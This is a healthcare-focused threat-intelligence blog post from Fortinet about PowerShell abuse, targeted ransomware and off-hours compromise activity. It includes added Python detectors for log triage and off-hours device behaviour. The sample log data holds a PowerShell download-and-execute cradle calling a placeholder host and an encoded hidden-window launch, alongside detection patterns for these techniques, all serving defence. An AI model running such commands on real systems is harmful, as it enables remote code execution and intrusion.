By Sonia E. Arista, CISM
National Healthcare Lead, Fortinet
Reviewing and responding to current threat intelligence is an essential part of any organization’s cybersecurity strategy. However, the need to regularly consult threat data and update defenses is amplified in the healthcare space, where interruptions to networks can be life-threatening. This is especially true as health systems become more reliant on technology and connected devices tied directly to patients and critical patient care. In addition, the average healthcare organization spends $1.4 million recovering from a breach, which impacts hospital revenue and can severely undermine reputation and trust — two cornerstones of patient experience and retention.
To minimize the risk of successful cyberattacks, security and IT teams must be constantly aware of the new methods designed to infiltrate networks and translate this into new tactics in their security efforts.
Threats to the Healthcare Space
While security teams need to remain abreast of all major threat trends — even those that seemingly only target other industries — there are a few standouts from the most recent Threat Landscape Report, which examines data collected during Q1 of 2019, that could specifically impact healthcare.
Living Off the Land
This refers to a style of attack that appeared consistently throughout Q1. Cybercriminals leverage pre-installed tools, such as PowerShell, that already exist on targeted systems and can be abused to launch attacks. This approach facilitates evasion, as the malicious code that is injected appears to be part of a sanctioned process, making it harder for security teams to detect and characterize. PowerShell, which comes installed on Windows machines, is one of the most commonly abused tools in these attacks. Cybercriminals use PowerShell to deliver ransomware and other malicious payloads, to encrypt data, and to move laterally across the network.
This is a tactic that healthcare IT teams must be highly aware of, especially given the number of IoT devices connecting to the network. Health systems are constantly deploying new connected tools as part of patient treatments, many of which were not built with security in mind. To address this, IT teams should regularly check devices to confirm that pre-installed tools have not been compromised and turned into an entry point into the network.
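One practical way to watch for the PowerShell abuse described above is to triage PowerShell script block logs for well-known living-off-the-land indicators. The following is an added illustration, not code from the report or from Fortinet; the log entries, indicator weights, host and user names are all constructed for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample entries in the shape of PowerShell Script Block Logging
# records (host, user, script text). Not real log data; the base64 value is a
# harmless placeholder standing in for an encoded command.
SAMPLE_EVENTS = [
    ("ed-ws-01", "svc_backup", "Get-ChildItem C:\\Backups | Where-Object Length -gt 1GB"),
    ("radiology-07", "rtech", "powershell -nop -w hidden -enc QUJDREVGR0hJSktM"),
    ("lab-03", "labuser", "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"),
    ("ed-ws-02", "nurse1", "Get-Service | Where-Object Status -eq 'Running'"),
]

# Weighted indicators: widely documented defensive heuristics, not an exhaustive list.
INDICATORS = {
    r"-enc(odedcommand)?\b": ("encoded command", 3),
    r"\bIEX\b|Invoke-Expression": ("in-memory execution", 3),
    r"DownloadString|DownloadFile|Invoke-WebRequest": ("remote download", 2),
    r"-w(indowstyle)?\s+hidden": ("hidden window", 2),
    r"-nop\b|-NoProfile": ("profile bypass", 1),
    r"-ep\s+bypass|ExecutionPolicy\s+Bypass": ("execution policy bypass", 2),
}


@dataclass
class Finding:
    host: str
    user: str
    score: int
    reasons: list


def score_script_block(text):
    """Return (total weight, matched indicator labels) for one script block."""
    hits = [(label, weight) for pattern, (label, weight) in INDICATORS.items()
            if re.search(pattern, text, re.IGNORECASE)]
    return sum(w for _, w in hits), [label for label, _ in hits]


def triage(events, threshold=3):
    """Keep only events whose indicator score reaches the threshold, for analyst review."""
    findings = []
    for host, user, script in events:
        score, reasons = score_script_block(script)
        if score >= threshold:
            findings.append(Finding(host, user, score, reasons))
    return findings
```

Routine administrative commands score zero here, while the encoded, hidden-window invocation and the download-and-execute cradle are surfaced for review.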
There have been several high-profile ransomware attacks this year that demonstrated a high degree of targeting and planning. In one instance of LockerGoga, the attackers had already done the due diligence to obtain privileged credentials that enabled execution of the malware. With these credentials, they were able to operate while deploying minimal evasion or obfuscation. This indicates that they had already evaluated the network defenses and judged such measures unnecessary.
Anatova was another standout ransomware in Q1, encrypting as many files as possible and ensuring minimal chances of restoration. Overall, it looks as though criminals are moving away from a purely opportunistic model of malware distribution to focus on specifically selected networks.
With this in mind, health systems must strengthen their malware defenses and ensure they have current, tested data backups. Hospitals are known targets for ransomware attacks because they are more willing to pay to reclaim data, most likely due to deficiencies or poor planning in data recovery and continuity processes. Even after a ransom is paid, recovered data may be corrupted or incomplete, with a potential impact on patient safety.
Pre- and Post-Compromise Activity
Evaluating the types of websites being leveraged, and the phase in the cyber kill chain at which they were accessed, provides insight into how cybercriminals structure their attacks and helps with defense efforts. The timing of pre- and post-compromise activity is also telling. Pre-compromise activity is three times more likely to occur during the work week, as it often depends on unintentional employee involvement. Post-compromise activity, however, occurs fairly consistently across weekdays and weekends, as little to no user interaction is required.
This brings to mind an important point about segmentation. Healthcare is an industry of constant uptime. The emergency department network, for example, must be running at all times, including the weekend, and cannot be halted or slowed by an attack. However, other departments do close. Should a device belonging to such a department log on outside its operating hours, that unusual behavior could be an indicator of an attack. Compromised systems operating during irregular business hours to initiate or extend attacks, or to move laterally across the network, could affect high-need networks like the ED. This is why healthcare systems should segment essential networks to add an extra layer of defense, while isolating devices that exhibit anomalous behavior until their purpose can be determined.
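The off-hours logic above can be turned into a simple detection: compare each device event against its department's operating hours, and escalate when a flagged device also reaches into another segment. This is an added example, not code from the report or from Fortinet; the department schedules, device names and event records are constructed assumptions.

```python
from datetime import datetime

# Constructed department operating hours as (open weekdays, open hour, close hour).
# Monday is weekday 0. The ED is always on, so it is never flagged on timing alone.
DEPARTMENT_HOURS = {
    "emergency": None,
    "outpatient-clinic": ({0, 1, 2, 3, 4}, 7, 19),
    "billing": ({0, 1, 2, 3, 4}, 8, 18),
}

# Constructed sample device events: (ISO timestamp, device, department, action).
# "smb-connect:<host>" is a made-up action label for a connection into another segment.
SAMPLE_EVENTS = [
    ("2019-03-12T10:15:00", "clinic-ws-04", "outpatient-clinic", "logon"),  # Tuesday, in hours
    ("2019-03-16T02:40:00", "clinic-ws-04", "outpatient-clinic", "logon"),  # Saturday 02:40
    ("2019-03-16T02:41:00", "clinic-ws-04", "outpatient-clinic", "smb-connect:ed-ws-01"),
    ("2019-03-16T03:05:00", "ed-ws-01", "emergency", "logon"),              # ED, always on
    ("2019-03-13T21:30:00", "billing-pc-02", "billing", "logon"),           # Wednesday, after close
]


def is_off_hours(ts, department):
    """True when the timestamp falls outside the department's schedule."""
    hours = DEPARTMENT_HOURS.get(department)
    if hours is None:
        return False
    days, open_h, close_h = hours
    return ts.weekday() not in days or not (open_h <= ts.hour < close_h)


def find_anomalies(events):
    """Group off-hours activity per device; recommend isolation when the device
    also touched another segment, which matches the lateral-movement concern."""
    flagged = {}
    for ts_str, device, dept, action in events:
        if not is_off_hours(datetime.fromisoformat(ts_str), dept):
            continue
        entry = flagged.setdefault(device, {"department": dept, "events": [], "lateral": False})
        entry["events"].append((ts_str, action))
        if action.startswith("smb-connect:"):
            entry["lateral"] = True
    for entry in flagged.values():
        entry["recommendation"] = "isolate-and-investigate" if entry["lateral"] else "investigate"
    return flagged
```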
Final Thoughts on Health IT Cybersecurity
Healthcare systems are common targets for cyberattacks. Staying aware of popular attack vectors and strategies enables IT teams to better secure crucial network functions. Moving forward, health IT teams should keep these Q1 findings in mind and fortify defenses accordingly.